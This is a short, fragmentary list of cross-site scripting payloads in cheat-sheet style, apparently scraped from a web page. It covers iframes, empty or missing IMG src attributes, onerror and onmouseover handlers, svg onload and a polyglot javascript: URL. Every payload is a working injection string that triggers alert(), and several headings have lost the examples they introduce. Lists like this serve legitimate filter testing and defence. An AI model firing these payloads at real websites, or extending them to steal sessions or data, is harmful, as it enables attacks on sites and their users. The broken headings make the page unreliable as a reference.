XSS 2

If iFrames are allowed there are a lot of other XSS problems as well:

IFrames and most other elements can use event based mayhem like the following:

Frames have the same sorts of XSS problems as iFrames

Bang

javascript:/*--><svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>

<IMG """>">

Default SRC Tag by Leaving it Empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC Tag by Leaving it out Entirely

On Error Alert

IMG onerror and JavaScript Alert Encode

<IMG SRC=javascript:alert("XSS")>

<IMG SRC="<javascript:alert>('XSS')"

<svg/onload=alert('XSS')> 3 comments